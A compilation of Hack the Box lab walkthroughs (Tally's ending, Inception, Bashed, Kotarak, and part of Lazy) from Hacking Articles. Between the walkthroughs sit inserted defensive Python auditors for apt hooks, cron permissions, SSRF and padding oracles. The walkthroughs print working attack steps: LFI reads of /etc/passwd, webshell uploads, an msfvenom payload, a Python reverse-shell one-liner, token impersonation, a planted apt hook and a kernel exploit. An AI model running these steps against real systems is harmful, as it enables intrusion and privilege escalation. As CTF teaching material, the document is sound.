use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set rhost 10.10.10.59
msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit

You will get a meterpreter session on the victim's machine in the first Metasploit instance; then finish the task by grabbing user.txt and root.txt. First type:

getuid

So currently we do not have NT AUTHORITY\SYSTEM privileges.

But we successfully grabbed user.txt from inside /Sarah/Desktop.

cd Sarah/Desktop
ls
cat user.txt

In this way we have completed our first task. Now let’s find root.txt!!

load incognito

Incognito, now a meterpreter extension, was originally a stand-alone application that let you impersonate user tokens after compromising a system. The first thing to do is identify whether there are any valid tokens on this system.

list_tokens -u

As for impersonation tokens, you can see that currently no token is available.

I then looked on Google for such a scenario and found a link to download RottenPotato from GitHub for privilege escalation.

git clone https://github.com/foxglovesec/RottenPotato.git

After downloading, you will have the rottenpotato.exe file.

Upload the exe to the victim's machine.

upload /root/Desktop/RottenPotato/rottenpotato.exe .

Now type the commands below to run the exe and then impersonate the SYSTEM token listed under the impersonation user tokens.

execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"

After that, when you run getuid again, it tells you that you have escalated to NT AUTHORITY\SYSTEM.

Then go back to the /Users directory and look at the directories inside it. You will find root.txt inside C:\Users\Administrator\Desktop; go and grab it to finish the task.

cd Administrator
cd Desktop
ls
cat root.txt

Fabulous!! The task has been completed and this box is hacked.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post Hack the Box Challenge: Tally Walkthrough appeared first on Hacking Articles.


Hello friends!! Today we are going to solve another challenge, “Inception”, which is categorised as a retired lab presented by Hack the Box for online penetration-testing practice. Solving this lab's challenges is not that easy; you have to use all your penetration testing skills. Let's start and learn how to breach the network and then exploit it to retrieve the desired information.

Level: Hard

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are accessible online, they have a static IP. The IP of Inception is 10.10.10.67, so let's start with nmap port enumeration.

nmap -A 10.10.10.67

From the image below you can observe that ports 80 and 3128 are open on the victim's machine.

Knowing port 80 was open, we opened the IP in the browser and the following page appeared, as shown below.

Then we checked its source code and found a reference to “dompdf”, which could be a directory, so let's go through it.

When we explored /dompdf in the browser, it listed some files. I was interested in the version, so we opened it and found version 0.6.0.

After that, with the help of searchsploit, we found exploit 33004.txt for dompdf 0.6.0.

This exploit gives an instance of exploiting the target machine through LFI.

Without wasting time we read the /etc/passwd file with the following command:

curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd

But we got a base64-encoded result, so we need to decode it.

From the image below you can observe that we decoded the base64 data successfully and can read the first username, Cobb.

After digging deeper, we found the default.conf file inside the Apache configuration, which the filter again returns as base64; use the URL below for that.

http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf

After decoding the base64 value found above, you will get a highlighted path for AuthUserFile, as shown in the image below. If you read the text inside the <Location> tag you will realise that it hints at login credentials for /webdav_test_inception and gives further security details such as the authentication type: Basic.

Again type the following command:

curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd

Hmmmmm!!! One more base64 value; let's decode this one too.

When we decoded the base64 value above we found a hash for user “webdav_tester”. We copied it into a text file and now use John the Ripper to crack this hash.

Type the following command to crack the hash with the help of rockyou.txt:

john hash --wordlist=/usr/share/wordlists/rockyou.txt

Great!! It gives “babygurl69”.

So we now have the username “webdav_tester” and password “babygurl69” for logging in to /webdav_test_inception, and since the authentication type is Basic we can use cadaver to upload a backdoor.

Type the following commands to upload a PHP backdoor:

cadaver http://10.10.10.67/webdav_test_inception
webdav_tester
babygurl69 
put /root/Desktop/qsd-php-backdoor.php

While uploading the PHP backdoor we tried many kinds of PHP backdoor, but among them qsd-php-backdoor.php worked; its default location is /usr/share/webshells/php.

Then we open the uploaded PHP shell in the browser and click “go to current working directory”.

http://10.10.10.67/webdav_test_inception/qsd-php-backdoor.php

This brings us into the /html directory, where we saw WordPress 4.8.3 and opened it.

Then we explored /wp-config.php and found username “root” and password “VwPddNh7xMZyDQoByQL4”. We also tried to log in to WordPress but it was not active.

We went back to the previous page, as shown below, and typed the following command in the execute-shell text field to identify all running services on the host.

netstat -antp

Here we found that SSH is open on the internal network and also observed a new interface, 192.168.0.10.

Since we know port 3128 is open for the Squid HTTP proxy, open the proxychains configuration file (/etc/proxychains.conf) and add it there, as shown in the image below.

Now connect over SSH through proxychains with the command below and enter the password found in /wp-config.php for user cobb.

proxychains ssh cobb@127.0.0.1

Nice!!! It works and we logged in successfully; let's grab user.txt first, as shown.

Then, to find the root.txt flag, we need privilege escalation, so type sudo -l, which shows the sudo permissions set for user cobb. You will see that cobb has ALL permissions. We then ran sudo su, got root and went for the root.txt file.

Dammitttttttt!!!!! It was a bloody trap, not real root access.

ifconfig tells us the IP is 192.168.0.10, so we thought to ping 192.168.0.1, and the host was up.

Then with the following command we came to know that ports 21, 22 and 53 were open.

nc -zv 192.168.0.1 1-65535 > results 2>&1; grep succeeded results

We logged in to FTP successfully with anonymous:anonymous and ran ls to list all directories and files.

Inside /etc we saw three files: passwd, crontab and, in /etc/default, tftpd-hpa. We downloaded all three files.

cd /etc
get passwd
get crontab
cd default
get tftpd-hpa

Then read all three downloaded files with cat:

cat passwd
cat tftpd-hpa
cat crontab

Here we saw something very interesting: every 5 minutes an apt-get update command runs.

Then we generated an SSH key pair with the following command:

ssh-keygen

Now enter the following commands to upload the public key to 192.168.0.1 using TFTP:

cd /root/.ssh
tftp 192.168.0.1
put id_rsa.pub /root/.ssh/authorized_keys

Since TFTP creates the authorized_keys file with permissions that let anyone read and write it, SSH public-key login fails because of the incorrect permissions; the file should be 600. So exit tftp and change the permissions of authorized_keys on that host.

quit

We were not sure how to change the permissions through the apt update command, so we searched Google and luckily found a link that helped us craft an apt configuration snippet that changes the authorized_keys permissions.

echo 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > rootshell
tftp 192.168.0.1
put rootshell /etc/apt/apt.conf.d/rootshell
quit
ssh root@192.168.0.1

Wait 5 minutes and you will get root access. After that grab the root.txt flag and hit the GOAL!!!

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.
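The root path above works because apt reads every fragment in /etc/apt/apt.conf.d and runs APT::Update::Pre-Invoke hooks as root, so a TFTP root that anyone can write into is effectively a root code-execution primitive. The following Python audit script is an added example, not part of the original walkthrough: it parses apt.conf.d fragments for the Pre-Invoke/Post-Invoke family of directives (flat form only), reports the commands they would run, and flags fragments that group or other can write; the sample fragments are constructed in a temporary directory.

```python
import re
import stat
import tempfile
from pathlib import Path
from typing import List, Tuple

# apt.conf directives that make apt or dpkg run arbitrary shell commands as root.
HOOK_KEYS = (
    "APT::Update::Pre-Invoke",
    "APT::Update::Post-Invoke",
    "APT::Update::Post-Invoke-Success",
    "DPkg::Pre-Invoke",
    "DPkg::Post-Invoke",
    "DPkg::Pre-Install-Pkgs",
)
_HOOK_KEYS_LC = {k.lower() for k in HOOK_KEYS}

# Matches   Key { "cmd1"; "cmd2"; };   and   Key "cmd";   (flat apt.conf list/scalar syntax;
# the nested  APT::Update { Pre-Invoke {...}; };  form is not handled by this example).
_HOOK_RE = re.compile(
    r'(?P<key>[A-Za-z:_-]+)\s*(?:\{(?P<list>[^}]*)\}|(?P<scalar>"[^"]*"))\s*;',
    re.DOTALL,
)
_STR_RE = re.compile(r'"([^"]*)"')


def strip_comments(text: str) -> str:
    """Drop whole-line // and # comments, which apt.conf allows."""
    return "\n".join(l for l in text.splitlines() if not l.lstrip().startswith(("//", "#")))


def find_hooks(text: str) -> List[Tuple[str, str]]:
    """Return (directive, command) pairs for every hook directive in one fragment."""
    hooks = []
    for m in _HOOK_RE.finditer(strip_comments(text)):
        key = m.group("key")
        if key.lower() not in _HOOK_KEYS_LC:
            continue
        body = m.group("list") if m.group("list") is not None else m.group("scalar")
        for cmd in _STR_RE.findall(body):
            hooks.append((key, cmd))
    return hooks


def loosely_writable(path: Path) -> bool:
    """True if group or other has write permission (apt.conf.d fragments should be 0644)."""
    return bool(path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_apt_conf_dir(conf_dir: Path) -> List[dict]:
    """Audit every fragment in an apt.conf.d directory; one finding per hook command."""
    findings = []
    for frag in sorted(p for p in conf_dir.iterdir() if p.is_file()):
        for key, cmd in find_hooks(frag.read_text(errors="replace")):
            findings.append({
                "file": frag.name,
                "directive": key,
                "command": cmd,
                "loosely_writable": loosely_writable(frag),
            })
    return findings


def build_sample_dir() -> Path:
    """Constructed sample apt.conf.d: one benign Debian-style fragment, one planted hook."""
    d = Path(tempfile.mkdtemp(prefix="apt.conf.d-"))
    (d / "20auto-upgrades").write_text(
        'APT::Periodic::Update-Package-Lists "1";\n'
        'APT::Periodic::Unattended-Upgrade "1";\n'
    )
    planted = d / "rootshell"
    # Same shape as the fragment dropped over TFTP in the walkthrough above.
    planted.write_text('APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};\n')
    planted.chmod(0o666)  # files created through a writable TFTP root are typically like this
    return d


if __name__ == "__main__":
    for f in audit_apt_conf_dir(build_sample_dir()):
        flag = "WRITABLE " if f["loosely_writable"] else ""
        print(f'{flag}{f["file"]}: {f["directive"]} -> {f["command"]}')
```

On a real system, point audit_apt_conf_dir at Path("/etc/apt/apt.conf.d") and compare the listed fragments against what your packages ship.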

The post Hack the Box Challenge: Inception Walkthrough appeared first on Hacking Articles.


Hello Friends!! Today we are going to solve the CTF challenge “Bashed”. It is a lab developed by Hack the Box, which has an amazing collection of online labs on which you can practise your penetration testing skills; the labs are designed for beginner to expert penetration testers. Bashed is a retired lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, they have a static IP. The Bashed lab has IP 10.10.10.68.

Now, as always, let's begin with port enumeration.

nmap -A 10.10.10.68

Knowing port 80 was open, we opened the IP in the browser and the following page appeared, as shown below.

Next, we used Kali's dirb tool to enumerate directories and found some important ones, such as /dev.

When you open the /dev directory in the browser you get a link to phpbash.php. Click on that link.

It redirects to the following page, which looks like a shell accessed through the browser.

After that, you can execute any arbitrary OS command to test whether it works. We ran ls to list the current directory.

Inside the /html directory we found an uploads folder, so now we can easily compromise the target by uploading a backdoor.

Using msfvenom we created a malicious shell.php file with the following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.28 lport=4444 -f raw > shell.php

At the same time, run multi/handler to catch the reverse connection from the victim.

We used a Python HTTP server to transfer the file; you can use any alternative transfer method. Download the malicious file with wget into the uploads directory.

Now execute the malicious shell.php from the browser, as shown below, and go back to the Metasploit framework for the reverse connection.

After executing the uploaded backdoor, return to Metasploit and wait for the meterpreter session.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.28
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit

From the image below you can observe that meterpreter session 1 opened, giving access to the victim's shell.

Now let's finish the task by grabbing user.txt and root.txt. First I moved into /home and checked the files and directories inside it.

cd home
ls

There is one directory, arrexel; when I explored /home/arrexel I saw user.txt and used cat to read it.

cd arrexel
ls
cat user.txt

Great!! We completed the 1st task; now on to the 2nd task.

To spawn a proper TTY shell on the target we need to import Python's pty module, so I ran the following commands from the meterpreter shell:

shell
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a

Run ls -al to list all directories with their permissions. You will notice that user scriptmanager has access to the /scripts directory.

When we tried to open /scripts as the default user, it showed Permission Denied. Running sudo -l tells us that we may run anything as scriptmanager without a password.

Then we ran the following commands to look into the scripts folder as scriptmanager:

sudo -u scriptmanager ls /scripts
sudo -u scriptmanager cat /scripts/test.py
sudo -u scriptmanager cat /scripts/test.txt

Since we found a Python file, our strategy is to replace the original test.py with a malicious Python file that opens a reverse connection to netcat; for that, save the following code in a text file.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Save this file with a .py extension, transfer it to the victim's system and start netcat listening on the port.

Note: replace 10.10.14.28 in the code with your VPN IP.

Now download the malicious Python file into /tmp:

wget http://10.10.14.28/root.py

Then copy root.py from /tmp over test.py in /scripts with the following command:

sudo -u scriptmanager cp /tmp/root.py /scripts/test.py

After some time you will get a reverse connection on the netcat terminal with root access. Now finish the task by capturing root.txt, as shown below.

nc -lvp 1234
id
cd /root
ls
cat root.txt
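The escalation above works because a scheduled job (evidently running as root, since the replaced script calls back with root privileges) executes /scripts/test.py while a lower-privileged user, reachable through sudo, can overwrite it. As an added example that is not part of the original walkthrough, the Python script below parses system crontab lines (the /etc/crontab and /etc/cron.d format with a user field), extracts the script each job runs, and flags root jobs whose script, or the directory holding it, can be modified by someone other than root; the crontab lines and files are constructed in a temporary directory, and the uid treated as trusted is a parameter so the demo runs unprivileged.

```python
import os
import shlex
import stat
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

# Interpreters whose first non-flag argument is the script actually being run.
INTERPRETERS = {"python", "python2", "python3", "bash", "sh", "perl", "php"}


def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (user, command) pairs from /etc/crontab or /etc/cron.d format.

    Job lines carry five schedule fields (or one @keyword), a user name and the command;
    comments, blank lines and VAR=value assignments are skipped.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs


def script_path(command: str) -> Optional[str]:
    """Return the program or script a cron command runs (shell chains are not followed)."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return None
    if not argv:
        return None
    if os.path.basename(argv[0]) in INTERPRETERS:
        # e.g. "python3 -u /scripts/test.py": skip interpreter flags, take the script
        return next((a for a in argv[1:] if not a.startswith("-")), None)
    return argv[0]


def writable_by_untrusted(path: Path, trusted_uid: int) -> bool:
    """True if owned by someone other than trusted_uid, or group/other writable."""
    st = path.stat()
    return st.st_uid != trusted_uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(text: str, trusted_uid: int = 0) -> List[dict]:
    """Flag root jobs whose script, or the directory holding it, an untrusted user could change."""
    findings = []
    for user, command in parse_system_crontab(text):
        target = script_path(command) if user == "root" else None
        if not target or not os.path.isabs(target) or not os.path.exists(target):
            continue
        p, reasons = Path(target), []
        if writable_by_untrusted(p, trusted_uid):
            reasons.append("script writable by non-root")
        if writable_by_untrusted(p.parent, trusted_uid):
            reasons.append("parent directory writable by non-root (script can be replaced)")
        if reasons:
            findings.append({"command": command, "script": target, "reasons": reasons})
    return findings


def build_sample() -> str:
    """Constructed sample: a /scripts-style directory and crontab lines running it as root."""
    root = Path(tempfile.mkdtemp(prefix="cron-audit-"))
    scripts = root / "scripts"
    scripts.mkdir()
    scripts.chmod(0o755)
    weak = scripts / "test.py"
    weak.write_text("print('hello')\n")
    weak.chmod(0o666)          # anyone can overwrite it: the walkthrough's situation
    safe = scripts / "backup.sh"
    safe.write_text("#!/bin/sh\necho backup\n")
    safe.chmod(0o755)
    return (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"*/5 * * * * root python3 {weak}\n"
        f"0 3 * * * root {safe} --full\n"
        f"*/5 * * * * scriptmanager python3 {weak}\n"   # not a root job: not a finding
    )


def demo() -> List[dict]:
    """Run the audit over the constructed sample, treating the current user as root's stand-in."""
    return audit_crontab(build_sample(), trusted_uid=os.getuid())


if __name__ == "__main__":
    for f in demo():
        print(f["script"], "->", "; ".join(f["reasons"]))
```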

2nd method for finding the root.txt flag.

In the method above we identified the machine's distribution release (14.0). So we started looking for a related kernel exploit on Google and luckily found one here for root privilege escalation.

Copy and paste the whole text into a file and save it as poc.c.

After that, compile it with the following command:

gcc poc.c -o pwn

Run a Python HTTP server to transfer it to the target.

Finally, download the compiled file pwn to the target machine with wget inside /dev/shm, as shown in the image, then give it full permissions and run it.

wget http://10.10.14.28/pwn
chmod 777 pwn
./pwn

It gives you root access; now grab the root.txt flag quickly, because the kernel will crash after some time.

cd /root
cat root.txt

Superb!! We completed the task and hacked this box.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post Hack the Box Challenge Bashed Walkthrough appeared first on Hacking Articles.


Hello friends!! Today we are going to solve another CTF challenge, “Kotarak”, which is available online for those who want to improve their penetration testing and black-box testing skills. Kotarak is a retired vulnerable lab presented by Hack the Box for online penetration practice at your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.

Level: Hard

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are available online they have a static IP; the IP of Kotarak is 10.10.10.55, so let's begin with nmap port enumeration.

nmap -p- -A 10.10.10.55 --open

From the image below you can observe that ports 22, 8009, 8080 and 60000 are open on the victim's machine.

As ports 8080 and 60000 are running HTTP, we opened the IP in our browser, first on port 8080. As soon as we open it we get a Tomcat authentication prompt asking for a username and password.

When we access the target on port 60000, we find a page hosted on the machine that can be used to access the internet.

Now we use dirb to enumerate the directories on the target:

dirb http://10.10.10.55:60000/

From the image below you can observe the highlighted directory that dirb found.

We now check whether the page is vulnerable to SSRF by trying to reach a forbidden page on the target machine through it.

When we open server-status through the vulnerable page, we can access the forbidden content. There we find that port 888 is listening locally on the target machine.

Then we opened http://localhost:888 through the page and found that it contains a few links to different files.

We open backup and find that it appears empty.

To gain further information we used curl to fetch the page and found that it is an XML file containing a username and password.

curl http://10.10.10.55:60000/url.php?path=localhost:888/?doc=backup
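The url.php?path= page on port 60000 is an SSRF: it fetches whatever target the client names, so loopback-only services such as server-status and the listener on port 888 become reachable from outside. As an added example that is not the box's code, the Python below shows the validation such a fetcher should apply before connecting: an allowlist of schemes and ports, resolving the host name and rejecting loopback, private, link-local and other non-public addresses (a constructed lookup table stands in for DNS so it runs offline), and returning the checked addresses so the caller connects to those rather than resolving again.

```python
import ipaddress
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

Resolver = Callable[[str], List[str]]   # host name -> list of address strings


class SSRFError(ValueError):
    """Raised when a client-supplied URL must not be fetched."""


def is_public_ip(addr: str) -> bool:
    """True only for globally routable unicast addresses (IPv4-mapped IPv6 is unwrapped)."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        return is_public_ip(str(ip.ipv4_mapped))
    return not (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_multicast
                or ip.is_reserved or ip.is_unspecified)


def validate_fetch_target(user_url: str, resolve: Resolver) -> Tuple[str, List[str]]:
    """Validate a user-supplied URL for a server-side fetcher.

    Returns (hostname, [resolved public addresses]). The caller must connect to one of
    those addresses instead of resolving the name again, so a DNS answer cannot change
    between the check and the connection.
    """
    parts = urlsplit(user_url.strip())
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise SSRFError(f"scheme not allowed: {parts.scheme or '(none)'}")
    if parts.username or parts.password:
        raise SSRFError("credentials in URL not allowed")
    host = parts.hostname
    if not host:
        raise SSRFError("missing host")
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        raise SSRFError("malformed port") from None
    if port not in ALLOWED_PORTS:
        raise SSRFError(f"port not allowed: {port}")
    # Literal IP hosts are checked directly. Anything else goes through the resolver, and
    # every returned address must be public; shorthand such as 2130706433 is caught here
    # as long as the resolver returns what the socket layer would actually connect to.
    try:
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        addrs = resolve(host)
    if not addrs:
        raise SSRFError(f"host does not resolve: {host}")
    for a in addrs:
        if not is_public_ip(a):
            raise SSRFError(f"host resolves to non-public address: {a}")
    return host, addrs


def is_fetch_allowed(user_url: str, resolve: Resolver) -> bool:
    """Boolean wrapper around validate_fetch_target."""
    try:
        validate_fetch_target(user_url, resolve)
        return True
    except SSRFError:
        return False


def constructed_resolver(name: str) -> List[str]:
    """Stand-in for DNS with constructed records (no real lookups are made)."""
    table = {
        "localhost": ["127.0.0.1"],
        "example.com": ["93.184.216.34"],                    # constructed sample answer
        "mixed.example": ["93.184.216.34", "10.0.0.5"],      # one public, one internal answer
        "internal.corp": ["192.168.0.10"],
    }
    return table.get(name.lower(), [])


if __name__ == "__main__":
    for url in ("http://example.com/", "localhost:888", "http://localhost:888/?doc=backup",
                "http://127.0.0.1/server-status", "http://mixed.example/"):
        print(f"{url}: {'allowed' if is_fetch_allowed(url, constructed_resolver) else 'blocked'}")
```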

We use these credentials to log in to the Tomcat manager application hosted on port 8080.

Once we had the right credentials for the Tomcat server, we found that it was vulnerable to this exploit here. We used Metasploit to exploit this vulnerability.

msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.55
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername admin
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword 3@g01PdhB!
msf exploit(multi/http/tomcat_mgr_upload) > exploit

Finally, we got a meterpreter session, as shown in the image below.

After gaining the reverse shell we started enumerating the target. In /home/tomcat/to_archive/pentest_data we find a few interesting files: a directory information tree file and a binary file.

We download both files to our system.

We used impacket-secretsdump to dump the hashes from these files.

We were able to crack one of the hashes and found it to be f16tomcat!

We use this to log in as atanas, then move into the /root folder and find a file called flag.txt. When we open it we find that it is a dummy flag.

In the root directory we also find a log file; looking at its content, we find it contains logs created by wget. We also find that the wget version used is 1.16.

Searching Exploit-DB we find that this version of wget is vulnerable to remote code execution.

We followed the instructions on exploit-db.com on how to exploit this vulnerability.

Then we opened the .wgetrc file in vim to change the post_file path from /etc/shadow to /root/root.txt.

We downloaded the exploit code from exploit-db.com and uploaded it to the target machine through meterpreter.

We then gave the file read, write and execute permissions.

We then used authbind to run the file, as authbind allows a program that would normally require superuser privileges to bind a privileged port to run as a non-privileged user. As soon as we ran the exploit we got the root flag.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast.

The post Hack the Box Challenge Kotarak Walkthrough appeared first on Hacking Articles.


Hello Friends!! Today we are going to solve the CTF challenge “Lazy”. It is a lab developed by Hack the Box, which has an amazing collection of online labs on which you can practise your penetration testing skills; the labs are designed for beginner to expert penetration testers. Lazy is a retired lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, they have a static IP. The Lazy lab has IP 10.10.10.18.

Now, as always, let's begin with port enumeration.

nmap -A 10.10.10.18

As you can see in the screenshot, we have two services running on the target machine: SSH and HTTP on ports 22 and 80 respectively.

Port 80 is open, so let's open the IP in our browser to see whether a website is hosted there. After opening the IP in the browser we were greeted by a simple page with Register and Login links. Clicking Register opens a form.

Then I decided to register with admin and 123 as username and password respectively.

But I got an alert “Duplicate entry ‘admin’ for key PRIMARY” and also received the error “can’t create user: user exists” when registering as admin. So the username “admin” is already registered; we thought of cracking its password for login, but that was quite tough.

Finally, I decided to use Burp Suite to capture the browser request. Here I simply registered with username aadmin and password 123.

In the intercepted request I saw the auth cookie. I then sent the intercepted request to Repeater to analyse its response. It gave the hint “invalid padding”, which means there could be a padding oracle vulnerability. To learn more about padding oracle vulnerabilities read our previous article here. Since I had already faced such a situation in the past, I knew what to do next.

Next, open a terminal and run the command shown in the image, which contains the target URL and the auth cookie copied above.

Then type 2 where it asks for the recommended ID.

The last part of the screenshot shows the decrypted value in base64, HEX and ASCII. The auth cookie is a combination of the username with its password, and from padbuster we come to know what the encrypted value for username admin needs to be.

We are very near our goal: just encrypt this auth cookie with the user set to admin once again. Here our plaintext is admin; let's encrypt it using padbuster.

Again type 2 where it asks for the recommended ID. The highlighted part is our encrypted value for admin. Copy it: “BAit——–AAAA”.

Now replace the original auth cookie with the encrypted value copied above and forward the intercepted request.

When Burp Suite sends the request, you are automatically logged in to the web server as the admin account. When you access the admin page you will find a URL “my key” that provides us with a username, mitsos, and an SSH key.
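The “invalid padding” hint is the whole vulnerability: a server that reports padding failures separately from other failures lets a client learn whether a modified ciphertext decrypts to well-formed plaintext, which is what padbuster automates. As an added example that is not the site's code, the Python below builds a CBC cookie over a small Feistel toy block cipher (a stand-in for AES so it runs with the standard library only; the keys and IV are constructed) and contrasts a leaky verifier, which returns a distinct error for bad padding, with a hardened one that authenticates the cookie with HMAC-SHA256 before decrypting and returns one generic error for every failure.

```python
import hashlib
import hmac
import os
BLOCK, HALF, ROUNDS = 16, 8, 8
KEY = b"constructed-demo-cipher-key"      # constructed for the demo, not a real secret
MAC_KEY = b"constructed-demo-mac-key"     # separate key for the authentication tag

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:HALF]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy Feistel block cipher standing in for AES; illustrative only."""
    l, r = block[:HALF], block[HALF:]
    for rnd in range(ROUNDS):
        l, r = r, _xor(l, _f(key, r, rnd))
    return r + l

def block_decrypt(key: bytes, block: bytes) -> bytes:
    r, l = block[:HALF], block[HALF:]
    for rnd in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def pkcs7_unpad(data: bytes) -> bytes:
    """Raises ValueError on malformed padding: the check a padding oracle leaks."""
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid padding")
    return data[:-n]

def cbc_encrypt(key: bytes, plaintext: bytes, iv: bytes) -> bytes:
    """Returns IV || C1 || ... || Cn over PKCS#7-padded plaintext."""
    n = BLOCK - len(plaintext) % BLOCK
    padded = plaintext + bytes([n]) * n
    prev, out = iv, [iv]
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    """Returns the still-padded plaintext; the caller checks the padding."""
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    return b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))

def make_cookie_leaky(user: str, iv=None) -> bytes:
    return cbc_encrypt(KEY, f"user={user}".encode(), iv or os.urandom(BLOCK))

def check_cookie_leaky(cookie: bytes) -> str:
    """Vulnerable verifier: padding failures are reported separately from other failures."""
    try:
        plain = pkcs7_unpad(cbc_decrypt(KEY, cookie))
    except ValueError:
        return "invalid padding"            # the oracle: exactly what padbuster keys on
    return "ok:" + plain[5:].decode(errors="replace") if plain.startswith(b"user=") else "bad cookie"

def make_cookie_safe(user: str, iv=None) -> bytes:
    """Encrypt-then-MAC: the tag covers IV and ciphertext, so any modification is detected."""
    ct = cbc_encrypt(KEY, f"user={user}".encode(), iv or os.urandom(BLOCK))
    return ct + hmac.new(MAC_KEY, ct, hashlib.sha256).digest()

def check_cookie_safe(cookie: bytes) -> str:
    """Hardened verifier: constant-time MAC check before decryption, one generic error."""
    ct, tag = cookie[:-32], cookie[-32:]
    expected = hmac.new(MAC_KEY, ct, hashlib.sha256).digest()
    if len(ct) < 2 * BLOCK or len(ct) % BLOCK or not hmac.compare_digest(tag, expected):
        return "invalid"
    try:
        plain = pkcs7_unpad(cbc_decrypt(KEY, ct))
    except ValueError:                      # unreachable for authentic cookies; still generic
        return "invalid"
    return "ok:" + plain[5:].decode(errors="replace") if plain.startswith(b"user=") else "invalid"

def tamper(cookie: bytes, index: int, mask: int) -> bytes:
    b = bytearray(cookie)
    b[index] ^= mask                        # with CBC, IV byte i controls plaintext byte i of block 1
    return bytes(b)

def oracle_demo() -> dict:
    """Judge the same two modified cookies with each verifier."""
    iv = bytes(range(BLOCK))                # constructed fixed IV so the demo is deterministic
    leaky, safe = make_cookie_leaky("aadmin", iv), make_cookie_safe("aadmin", iv)
    # "user=aadmin" is 11 bytes, so the block ends in five 0x05 pad bytes. Flipping IV[15]
    # by 0x05^0x01 makes the last byte 0x01 (still valid padding); flipping it by 0x01
    # makes it 0x04 (invalid). Only the leaky verifier lets a client tell the two apart.
    return {
        "leaky_valid_pad": check_cookie_leaky(tamper(leaky, 15, 0x05 ^ 0x01)),
        "leaky_invalid_pad": check_cookie_leaky(tamper(leaky, 15, 0x01)),
        "safe_valid_pad": check_cookie_safe(tamper(safe, 15, 0x05 ^ 0x01)),
        "safe_invalid_pad": check_cookie_safe(tamper(safe, 15, 0x01)),
    }
```

Running oracle_demo() shows the leaky verifier answering "ok:aadmin..." for one modification and "invalid padding" for the other, while the hardened verifier answers "invalid" to both.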

As you can observe, we opened the SSH key; let's save it into a text file called “key” on the desktop. Notice that the URL reveals the SSH login username mitsos.

First download the key and give it appropriate permissions with chmod. Now that we have the SSH username and key, let's get an SSH session.

ssh -i key mitsos@10.10.10.18

After successfully getting a PTY shell on the victim, a simple ‘ls’ showed us user.txt. Congrats, we got our user flag.

Now, let’s work on the root flag.

